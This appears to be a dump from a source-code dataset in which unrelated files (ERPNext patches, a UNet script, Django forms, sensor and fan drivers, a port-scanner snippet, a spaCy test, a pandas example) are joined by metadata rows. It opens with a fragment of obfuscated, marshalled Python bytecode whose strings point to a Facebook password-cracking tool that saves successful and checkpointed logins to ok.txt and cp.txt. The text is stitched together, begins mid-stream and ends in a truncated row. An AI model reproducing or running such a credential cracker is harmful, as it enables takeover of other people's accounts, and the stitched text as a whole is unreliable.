x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0e\x00\x17\x83\x01\x00\x01ng\x00d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rY\x07d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0e\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0e\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x0e\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x17\x00\x00\x00NR@\x00\x00\x00RF\x00\x00\x00s\x1e\x00\x00\x00http://localhost:5000/auth?id=s\x06\x00\x00\x00&pass=R.\x00\x00\x00R/\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;32m[Successful] \x1b[1;30ms\x03\x00\x00\x00 | s\x07\x00\x00\x00\x1b[0;97ms\x06\x00\x00\x00ok.txtRH\x00\x00\x00s\x01\x00\x00\x00\ns\x10\x00\x00\x00www.facebook.comR0\x00\x00\x00s\x14\x00\x00\x00\x1b[1;93m[Checkpoint] s\x06\x00\x00\x00cp.txtRJ\x00\x00\x00RK\x00\x00\x00RL\x00\x00\x00RN\x00\x00\x00RM\x00\x00\x00RO\x00\x00\x00(\x0c\x00\x00\x00RP\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00RR\x00\x00\x00t\x07\x00\x00\x00apppend(\x0f\x00\x00\x00RS\x00\x00\x00RT\x00\x00\x00R7\x00\x00\x00R\x17\x00\x00\x00RU\x00\x00\x00R9\x00\x00\x00R*\x00\x00\x00R?\x00\x00\x00RY\x00\x00\x00RX\x00\x00\x00RZ\x00\x00\x00R[\x00\x00\x00R\\\x00\x00\x00R]\x00\x00\x00R^\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ra\x00\x00\x00\xec\x02\x00\x00s\xdc\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01\x1e\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x18\x02\x03\x01i\x1e\x00\x00\x00s \x00\x00\x00\x1b[1;93mThe process has completeds\x14\x00\x00\x00\x1b[1;93mTotal Ok/Cp :Rb\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;93mPress entet to back (\x1b\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R 
\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x10\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00R2\x00\x00\x00R\x0b\x00\x00\x00Re\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00Rz\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x00\x00\x00\x00Rh\x00\x00\x00(\x0c\x00\x00\x00Ri\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R7\x00\x00\x00Rm\x00\x00\x00R+\x00\x00\x00Ra\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rz\x00\x00\x00\x94\x02\x00\x00s\xc6\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01\x1b\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01!\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01\x07\x01\x15\x01\r\x01\x05\x01\x05\x01\t\x01\x05\x01\x12~\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01)\x01\x05\x01\t\x01\x05\x01\n\x01t\x08\x00\x00\x00__main__(1\x00\x00\x00R\x06\x00\x00\x00t\x03\x00\x00\x00sysR"\x00\x00\x00t\x08\x00\x00\x00datetimet\x02\x00\x00\x00ret\x06\x00\x00\x00randomt\x07\x00\x00\x00hashlibt\t\x00\x00\x00threadingR\x1e\x00\x00\x00t\x07\x00\x00\x00getpasst\x06\x00\x00\x00urllibt\t\x00\x00\x00cookielibR\x1c\x00\x00\x00t\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR\x07\x00\x00\x00t\x04\x00\x00\x00patht\x06\x00\x00\x00isfilet\x13\x00\x00\x00requests.exceptionsR\x02\x00\x00\x00R#\x00\x00\x00t\x07\x00\x00\x00randintt\x02\x00\x00\x00bdt\x03\x00\x00\x00simt\x04\x00\x00\x00reprR2\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingR\x12\x00\x00\x00R\x13\x00\x00\x00t\x02\x00\x00\x00c3R\x08\x00\x00\x00R\x0b\x00\x00\x00R\n\x00\x00\x00R\x15\x00\x00\x00R\x14\x00\x00\x00R&\x00\x00\x00R\x0f\x00\x00\x00R=\x00\x00\x00Rc\x00\x00\x00Re\x00\x00\x00Rd\x00\x00\x00Ro\x00\x00\x00Ru\x00\x00\x00Rv\x00\x00\x00R\x10\x00\x00\x00Rz\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x08\x00\x00\x00<module>\x04\x00\x00\x00sn\x00\x00\x00\x03\x01\x9c\x01\x14\x01\r\x01\r\x01\x11\x01\r\x0b\x12\x01\x10\x01\x12\x01\x10\x01\x10\x01\r\x01\x12\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\r\x01\x10\x01\x12\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\r\x01\x10\x01\x12\x01\x12\x01P\x01\n\x01\r\x01\x06\x01\x06\x01\x06\x02\t\x02\t\n\t\x0b\t\n\t"\t"\t,\t\xea\t\x0b\t\t\t\x12\t_\t+\t\x08\t,\t\xe2\x0c\x01'))
| 16,569.75 | 66,237 | 0.748276 |
039e52111c90723aebbd1f70afb6aac22ebd8187
| 1,087 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v4_0/create_price_list_if_missing.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v4_0/create_price_list_if_missing.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v4_0/create_price_list_if_missing.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils.nestedset import get_root_of
def execute():
# setup not complete
if not frappe.db.sql("""select name from tabCompany limit 1"""):
return
if "shopping_cart" in frappe.get_installed_apps():
frappe.reload_doc("shopping_cart", "doctype", "shopping_cart_settings")
if not frappe.db.sql("select name from `tabPrice List` where buying=1"):
create_price_list(_("Standard Buying"), buying=1)
if not frappe.db.sql("select name from `tabPrice List` where selling=1"):
create_price_list(_("Standard Selling"), selling=1)
def create_price_list(pl_name, buying=0, selling=0):
price_list = frappe.get_doc({
"doctype": "Price List",
"price_list_name": pl_name,
"enabled": 1,
"buying": buying,
"selling": selling,
"currency": frappe.db.get_default("currency"),
"territories": [{
"territory": get_root_of("Territory")
}]
})
price_list.insert()
| 30.194444 | 74 | 0.734131 |
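For context on how a patch module like erpnext/patches/v4_0/create_price_list_if_missing.py above actually runs: during `bench migrate`, Frappe imports every dotted module path listed in the app's patches.txt and calls its execute(). A sketch of the corresponding entry, derived from the file path in the record metadata (the surrounding lines of the real patches.txt are not reproduced here):
# apps/erpnext/erpnext/patches.txt  (excerpt, reconstructed)
erpnext.patches.v4_0.create_price_list_if_missing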
2066c8d39c1df13a482f93785ddd8ecab22faca8
| 1,207 |
py
|
Python
|
src/test_unet.py
|
tuanminh3395/gr-bone-age
|
248c929d75e9d88dc9fa102ea11f4eae1e0f3157
|
[
"MIT"
] | null | null | null |
src/test_unet.py
|
tuanminh3395/gr-bone-age
|
248c929d75e9d88dc9fa102ea11f4eae1e0f3157
|
[
"MIT"
] | null | null | null |
src/test_unet.py
|
tuanminh3395/gr-bone-age
|
248c929d75e9d88dc9fa102ea11f4eae1e0f3157
|
[
"MIT"
] | null | null | null |
import numpy as np
from keras.models import Model
from data_unet import load_test_data, desired_size
from train_unet import preprocess, batch_size
import os
from skimage.io import imsave
from constants import mask_raw_path, get_unet
print('-'*30)
print('Loading and preprocessing test data...')
print('-'*30)
imgs_test, imgs_id_test = load_test_data()
imgs_test = preprocess(imgs_test)
# mean = np.mean(imgs_test) # mean for data centering
# std = np.std(imgs_test) # std for data normalization
# imgs_test -= mean
# imgs_test /= std
print('-'*30)
print('Loading saved weights...')
print('-'*30)
model = get_unet()
model.load_weights('unet.h5')
print('-'*30)
print('Predicting masks on test data...')
print('-'*30)
imgs_mask_test = model.predict(imgs_test, verbose=1, batch_size=batch_size)
np.save('imgs_mask_test.npy', imgs_mask_test)
print('-' * 30)
print('Saving predicted masks to files...')
print('-' * 30)
if not os.path.exists(mask_raw_path):
os.mkdir(mask_raw_path)
mask_size = (desired_size, desired_size)
for image, image_id in zip(imgs_mask_test, imgs_id_test):
image = (image[:, :, 0])
print(image_id)
imsave(os.path.join(mask_raw_path, str(image_id) + '.png'), image)
| 27.431818 | 75 | 0.730737 |
6406694116160953f2f9538a3a833a116f31c961
| 8,500 |
py
|
Python
|
bets/forms.py
|
Thames1990/BadBatBets
|
8dffb69561668b8991bf4103919e4b254d4ca56a
|
[
"MIT"
] | null | null | null |
bets/forms.py
|
Thames1990/BadBatBets
|
8dffb69561668b8991bf4103919e4b254d4ca56a
|
[
"MIT"
] | null | null | null |
bets/forms.py
|
Thames1990/BadBatBets
|
8dffb69561668b8991bf4103919e4b254d4ca56a
|
[
"MIT"
] | null | null | null |
from django import forms
from django.core.exceptions import ValidationError
from django.utils import timezone
from .models import ChoiceBet, DateBet
from .util import create_choices
from ledger.models import Account
from profiles.models import ForbiddenUser
class ChoiceBetCreationForm(forms.ModelForm):
class Meta:
model = ChoiceBet
fields = ['name', 'description', 'end_bets_date', 'end_date']
pub_date = forms.DateField(widget=forms.SelectDateWidget, required=False)
end_bets_date = forms.DateField(widget=forms.SelectDateWidget, required=False)
end_date = forms.DateField(widget=forms.SelectDateWidget, required=False)
forbidden = forms.ModelMultipleChoiceField(queryset=ForbiddenUser.objects.all(), required=False)
def __init__(self, *args, **kwargs):
super(ChoiceBetCreationForm, self).__init__(*args, **kwargs)
self.fields['forbidden'].widget.attrs["size"] = ForbiddenUser.objects.all().count()
def clean_pub_date(self):
pub_date = self.cleaned_data.get('pub_date')
if pub_date is None:
return pub_date
if pub_date <= timezone.now().date():
raise ValidationError(
'If you set a publication date, it has to be in the future. If you want the bet to be visible '
'immediately, do not set a publication date.',
code='pub_date_not_in_future')
return pub_date
def clean_end_bets_date(self):
pub_date = self.cleaned_data.get('pub_date')
end_bets_date = self.cleaned_data.get('end_bets_date')
if end_bets_date is None:
return end_bets_date
if pub_date is None:
if end_bets_date <= timezone.now().date():
raise ValidationError('Must give at least 1 day to place bets.', code='end_bets_not_in_future')
elif end_bets_date <= pub_date:
raise ValidationError('Bet placement has to be open after publish date.',
code='end_bets_date_before_pub_date')
return end_bets_date
    def clean_end_date(self):
        pub_date = self.cleaned_data.get('pub_date')
        end_bets_date = self.cleaned_data.get('end_bets_date')
        end_date = self.cleaned_data.get('end_date')
        if end_date is None:
            return end_date
        # Guard against None like the other clean_* methods, otherwise the comparison raises
        if end_bets_date is not None and end_date < end_bets_date:
            raise ValidationError('Placement of bets cannot be sustained after the bet is closed',
                                  code='end_date_before_end_bets_date')
        if pub_date is not None and end_date <= pub_date:
            raise ValidationError('The timespan between the publication date and end date must be at least one day.',
                                  code='bet_timespan_too_short')
        return end_date
def save(self, request):
name = self.cleaned_data['name']
description = self.cleaned_data['description']
pub_date = self.cleaned_data['pub_date']
end_bets_date = self.cleaned_data['end_bets_date']
end_date = self.cleaned_data.get('end_date')
forbidden = self.cleaned_data['forbidden']
account = Account(name=name, type='b')
account.save()
new_bet = ChoiceBet(
owner=request.user.profile,
name=name,
description=description,
end_bets_date=end_bets_date,
end_date=end_date,
account=account
)
try:
choices = create_choices(request, new_bet)
except ValidationError:
raise
new_bet.save()
for choice in choices:
choice.save()
for forbidden_user in forbidden:
new_bet.forbidden.add(forbidden_user)
if pub_date is not None:
new_bet.pub_date = pub_date
new_bet.save()
return new_bet
class DateBetCreationForm(forms.ModelForm):
class Meta:
model = DateBet
fields = ['name', 'description', 'end_bets_date', 'time_period_start', 'time_period_end']
pub_date = forms.DateField(widget=forms.SelectDateWidget, required=False)
end_bets_date = forms.DateField(widget=forms.SelectDateWidget, required=False)
time_period_start = forms.DateField(widget=forms.SelectDateWidget, required=False)
time_period_end = forms.DateField(widget=forms.SelectDateWidget, required=False)
forbidden = forms.ModelMultipleChoiceField(queryset=ForbiddenUser.objects.all(), required=False)
def clean_pub_date(self):
pub_date = self.cleaned_data.get('pub_date')
if pub_date is None:
return pub_date
if pub_date <= timezone.now().date():
raise ValidationError(
'If you set a publication date, it has to be in the future. If you want the bet to be visible '
'immediately, do not set a publication date.',
code='pub_date_not_in_future')
return pub_date
def clean_end_bets_date(self):
pub_date = self.cleaned_data.get('pub_date')
end_bets_date = self.cleaned_data.get('end_bets_date')
if end_bets_date is None:
return end_bets_date
if pub_date is None:
if end_bets_date <= timezone.now().date():
raise ValidationError('Must give at least 1 day to place bets.', code='end_bets_not_in_future')
elif end_bets_date < pub_date:
raise ValidationError('Bet placement has to be open after publish date.',
code='end_bets_date_before_pub_date')
return end_bets_date
def clean_time_period_start(self):
pub_date = self.cleaned_data.get('pub_date')
time_period_start = self.cleaned_data.get('time_period_start')
if time_period_start is None:
return time_period_start
if pub_date is None:
if time_period_start <= timezone.now().date():
raise ValidationError(
'The period to bet on must be in the future.', code='time_period_start_not_in_future')
elif time_period_start <= pub_date:
raise ValidationError(
'The period to bet on has to start after Publication. Do not set a start date if you want the '
'period to start at publication.',
code='time_period_start_not_greater_pub')
return time_period_start
def clean_time_period_end(self):
pub_date = self.cleaned_data.get('pub_date')
time_period_start = self.cleaned_data.get('time_period_start')
time_period_end = self.cleaned_data.get('time_period_end')
if time_period_end is None:
return time_period_end
if (pub_date is None) and (time_period_start is None):
if time_period_end <= timezone.now().date():
raise ValidationError('The period to bet on must not end in the past', code='period_end_not_in_future')
elif not (time_period_start is None):
if time_period_start >= time_period_end:
raise ValidationError('The period to bet on must end after it has started',
code='period_end_not_greater_period_start')
elif not (pub_date is None):
if time_period_end <= pub_date:
raise ValidationError('The period to bet on must not end before the bet is visible',
code='period_end_not_greater_pub')
return time_period_end
def save(self, user):
name = self.cleaned_data['name']
description = self.cleaned_data['description']
pub_date = self.cleaned_data['pub_date']
end_bets_date = self.cleaned_data['end_bets_date']
time_period_start = self.cleaned_data['time_period_start']
time_period_end = self.cleaned_data['time_period_end']
forbidden = self.cleaned_data['forbidden']
account = Account(name=name, type='b')
account.save()
new_bet = DateBet.objects.create(
owner=user,
name=name,
description=description,
end_bets_date=end_bets_date,
time_period_start=time_period_start,
time_period_end=time_period_end,
account=account
)
for forbidden_user in forbidden:
new_bet.forbidden.add(forbidden_user)
if pub_date is not None:
new_bet.pub_date = pub_date
new_bet.save()
return new_bet
| 37.946429 | 119 | 0.640353 |
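A minimal sketch of how ChoiceBetCreationForm above would typically be driven from a Django view. This view is not part of the original record: the URL name, template path, and error message are placeholders, and it assumes the template also renders the choice inputs that create_choices() reads back out of the request.
from django.core.exceptions import ValidationError
from django.shortcuts import redirect, render
from .forms import ChoiceBetCreationForm

def create_choice_bet(request):
    if request.method == "POST":
        form = ChoiceBetCreationForm(request.POST)
        if form.is_valid():
            try:
                # save() needs the request: it reads the owner profile and the
                # submitted choices (via create_choices) from it
                form.save(request)
            except ValidationError:
                form.add_error(None, "Invalid choices submitted.")  # placeholder message
            else:
                return redirect("bets:index")  # placeholder URL name
    else:
        form = ChoiceBetCreationForm()
    return render(request, "bets/create.html", {"form": form})  # placeholder template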
ff5b26b516499285945eef1f432205d908264405
| 1,739 |
py
|
Python
|
haas_lib_bundles/python/docs/examples/solar_street_lamp/haas506/code/yuanda_htb485.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
haas_lib_bundles/python/docs/examples/solar_street_lamp/haas506/code/yuanda_htb485.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
haas_lib_bundles/python/docs/examples/solar_street_lamp/haas506/code/yuanda_htb485.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
import ustruct
class HTB485(object):
    """Yuanda HTB485 humidity/temperature/brightness sensor on an RS-485/Modbus bus.
    Values are returned as raw holding-register readings: humidity and temperature
    come from registers 0-1, brightness from register 3."""
def __init__(self, mbObj, devAddr):
self.mbObj = mbObj
self.devAddr = devAddr
def getHumidity(self):
if self.mbObj is None:
raise ValueError("invalid modbus object.")
value = bytearray(4)
ret = self.mbObj.readHoldingRegisters(self.devAddr, 0, 2, value, 200)
if ret[0] < 0:
raise ValueError("readHoldingRegisters failed. errno:", ret[0])
humidity = ustruct.unpack('hh',value)
return humidity[0]
def getTemperature(self):
if self.mbObj is None:
raise ValueError("invalid modbus object.")
value = bytearray(4)
ret = self.mbObj.readHoldingRegisters(self.devAddr, 0, 2, value, 200)
if ret[0] < 0:
raise ValueError("readHoldingRegisters failed. errno:", ret[0])
temperature = ustruct.unpack('hh',value)
return temperature[1]
def getBrightness(self):
if self.mbObj is None:
raise ValueError("invalid modbus object.")
value = bytearray(4)
ret = self.mbObj.readHoldingRegisters(self.devAddr, 2, 2, value, 200)
if ret[0] < 0:
raise ValueError("readHoldingRegisters failed. errno:", ret[0])
brightness = ustruct.unpack('hh',value)
return brightness[1]
def getHTB(self):
if self.mbObj is None:
raise ValueError("invalid modbus object.")
value = bytearray(10)
ret = self.mbObj.readHoldingRegisters(self.devAddr, 0, 5, value, 200)
if ret[0] < 0:
raise ValueError("readHoldingRegisters failed. errno:", ret[0])
htb = ustruct.unpack('hhhhh',value)
return htb
| 35.489796 | 77 | 0.598045 |
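A self-contained usage sketch for the HTB485 driver above. Rather than assuming a particular RS-485/Modbus library, it uses a stub object exposing the readHoldingRegisters() signature the driver expects, so the four getters can be exercised without real hardware; the register values are made up for illustration.
try:
    import ustruct                 # MicroPython
except ImportError:
    import struct as ustruct       # CPython fallback for the stub itself
from yuanda_htb485 import HTB485   # module name taken from the record's file path

class FakeModbus(object):
    # Mimics the bus object the driver expects: fill the caller's buffer with
    # `count` 16-bit holding registers starting at `start`, return (errno,).
    REGISTERS = [450, 230, 0, 512, 0]   # made-up humidity, temperature, -, brightness, -
    def readHoldingRegisters(self, devAddr, start, count, buf, timeout):
        regs = self.REGISTERS[start:start + count]
        buf[:] = ustruct.pack('h' * count, *regs)
        return (0,)

htb = HTB485(FakeModbus(), devAddr=1)
print(htb.getHumidity())      # 450 (raw register value)
print(htb.getTemperature())   # 230
print(htb.getBrightness())    # 512
print(htb.getHTB())           # (450, 230, 0, 512, 0)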
92311f2e2b58ac2083d59f134f408c5e06c2e09a
| 265 |
py
|
Python
|
showcase11/com/aaron/scan_port_example.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | null | null | null |
showcase11/com/aaron/scan_port_example.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | 2 |
2021-03-25T22:00:07.000Z
|
2022-01-20T15:51:48.000Z
|
showcase11/com/aaron/scan_port_example.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
scan port example
pip install port-scanner
"""
__author__ = "aaron.qiu"
import portscanner  # was missing: the code below uses portscanner.Target
if __name__ == '__main__':
    my_target = portscanner.Target("example.com")
    my_target.scan(min=1, max=100, timeout=0.01)
    my_target.report(all=True)
| 18.928571 | 49 | 0.686792 |
92942f910127b90360068e98568ff32c14d65a26
| 863 |
py
|
Python
|
exercises/en/test_02_06.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | 2 |
2020-07-07T01:46:37.000Z
|
2021-04-20T03:19:43.000Z
|
exercises/en/test_02_06.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/en/test_02_06.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
def test():
assert (
"import Doc, Span" in __solution__ or "import Span, Doc" in __solution__
), "Did you import the Doc and Span correctly?"
assert doc.text == "I like David Bowie", "Did you create the Doc correctly?"
assert span.text == "David Bowie", "Did you create the span correctly?"
assert span.label_ == "PERSON", "Did you add the label PERSON to the span?"
assert "doc.ents =" in __solution__, "Did you overwrite the doc.ents?"
assert len(doc.ents) == 1, "Did you add the span to the doc.ents?"
assert (
list(doc.ents)[0].text == "David Bowie"
), "Did you add the span to the doc.ents?"
__msg__.good(
"Perfect! Creating spaCy's objects manually and modifying the "
"entities will come in handy later when you're writing your own "
"information extraction pipelines."
)
| 47.944444 | 80 | 0.653534 |
a60e18ef434f690ad4ed8f93952168aa16c0810b
| 1,028 |
py
|
Python
|
haas_lib_bundles/python/docs/examples/smart_fan/esp32/code/fan.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
haas_lib_bundles/python/docs/examples/smart_fan/esp32/code/fan.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
haas_lib_bundles/python/docs/examples/smart_fan/esp32/code/fan.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
from driver import PWM
class Fan(object):
def __init__(self, pwmObj,data=None):
self.pwmObj = None
if not isinstance(pwmObj, PWM):
raise ValueError("parameter is not an PWM object")
self.pwmObj = pwmObj
if data is not None:
self.data = data
self.setOptionDuty()
else:
self.data = {'freq':2000, 'duty': 0 }
def setOptionDuty(self):
if self.pwmObj is None:
raise ValueError("invalid PWM object")
self.pwmObj.setOption(self.data)
def control(self,gear):
if not isinstance(gear,int):
raise ValueError("gear is not an int object")
if not gear in range(4):
raise ValueError("gear must be in range 0-3")
if gear == 0:
self.data['duty'] = 0
if gear == 1:
self.data['duty'] = 33
if gear == 2:
self.data['duty'] = 66
if gear == 3:
self.data['duty'] = 99
self.setOptionDuty()
| 27.052632 | 62 | 0.532101 |
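A hedged usage sketch for the Fan class above, assuming it runs on a HaaS-style board where the driver module is available; the PWM channel name "fan_pwm" is an illustrative assumption and must match an entry in the board's board.json.
from driver import PWM
pwm = PWM()
pwm.open("fan_pwm")                    # hypothetical board.json PWM node
fan = Fan(pwm, {'freq': 2000, 'duty': 0})
fan.control(3)                         # highest gear, 99% duty cycle
fan.control(0)                         # gear 0 stops the fan
pwm.close()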
a6515768876861b3dca850a779c2dc12e5cddce9
| 861 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v6_20x/remove_customer_supplier_roles.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v6_20x/remove_customer_supplier_roles.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v6_20x/remove_customer_supplier_roles.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
from __future__ import unicode_literals
import frappe
def execute():
frappe.reload_doc("buying", "doctype", "request_for_quotation_supplier")
frappe.reload_doc("buying", "doctype", "request_for_quotation_item")
frappe.reload_doc("buying", "doctype", "request_for_quotation")
frappe.reload_doc("projects", "doctype", "timesheet")
for role in ('Customer', 'Supplier'):
frappe.db.sql('''delete from `tabHas Role`
where role=%s and parent in ("Administrator", "Guest")''', role)
if not frappe.db.sql('select name from `tabHas Role` where role=%s', role):
# delete DocPerm
for doctype in frappe.db.sql('select parent from tabDocPerm where role=%s', role):
d = frappe.get_doc("DocType", doctype[0])
d.permissions = [p for p in d.permissions if p.role != role]
d.save()
# delete Role
frappe.delete_doc_if_exists('Role', role)
| 35.875 | 85 | 0.70964 |
1bd3dbdc1cc7eaf5089a486ae1be33c3ead7d270
| 717 |
py
|
Python
|
python/en/_pandas/my_example/pd_read_csv_df_to_numpy.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_pandas/my_example/pd_read_csv_df_to_numpy.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_pandas/my_example/pd_read_csv_df_to_numpy.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
'''
Read a dataframe into a numpy array.
'''
import os
import numpy as np
import pandas as pd
if __name__ == '__main__':
dir_input = 'input'
filename = 'example.csv'
file = os.path.join( dir_input, filename )
df = pd.read_csv( file, header=0 )
data_np = df.to_numpy()
# array([[22338, 11479, 26706, ..., 6647, 0, 0],
# [ 7144, 8366, 12232, ..., 26923, 25935, 27134],
# [25235, 26195, 11457, ..., 0, 0, 0],
# ...,
# [30140, 12388, 8489, ..., 0, 0, 0],
# [14151, 9603, 5506, ..., 0, 0, 0],
# [10946, 1203, 20637, ..., 0, 0, 0]], dtype=int64)
| 29.875 | 74 | 0.447699 |
847223b8683037e6c728e510a594e0c5d05adb56
| 652 |
py
|
Python
|
tools/legacy/pac-man/plugins/postinstall/rename.py
|
gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 2 |
2020-03-18T18:23:27.000Z
|
2020-08-02T15:59:16.000Z
|
tools/legacy/pac-man/plugins/postinstall/rename.py
|
